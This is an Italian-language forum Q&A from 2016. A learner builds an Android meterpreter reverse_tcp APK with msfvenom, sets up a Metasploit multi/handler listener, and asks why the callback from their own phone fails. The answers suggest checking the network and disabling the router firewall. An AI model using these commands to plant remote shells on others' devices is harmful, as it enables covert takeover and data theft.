(exploit) reverse_tcp non si connetterà? [chiuso]

1

okay, sono un po 'nuovo nello sfruttamento ecc. ma non riesco a capire perché non riesco a creare una connessione con il mio telefono e con il gestore kali di tcp

Ecco cosa faccio: prima di tutto faccio l'apk

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=**(MYIP)** LPORT=**(MYPORT)** R >shell.apk

No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8326 bytes

Quindi ho impostato l'exploit:

msf > use multi/handler 

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

payload => android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST **(MYIP)** 

LHOST => **(MYIP)**

msf exploit(handler) > set LHOST **(MYPORT)**

LHOST => **(MYPORT)**

msf exploit(handler) > exploit

[*] Started reverse TCP handler on **(MYIP):(MYPORT)**

[*] Starting the payload handler...

Quindi eseguo shell.apk sul mio samsung s7 edge e non riesco a connettermi al payload.

Qualcuno può aiutarmi?

    
posta TheNabTriesToLearn 01.12.2016 - 21:07
fonte

2 risposte

0

Assicurati che tu e il dispositivo siano connessi sulla stessa rete. Inoltre, l'applicazione deve essere in esecuzione in background. Hai lanciato l'app sul tuo Samsung S7 dopo aver avviato l'exploit? Penso che l'app per Android sia chiamata "MainActivity".

    
risposta data 01.12.2016 - 21:26
fonte
-2

La soluzione è risultata essere la seguente:

Ho disattivato il firewall del mio router e ha funzionato.

    
risposta data 02.12.2016 - 16:18
fonte

Leggi altre domande sui tag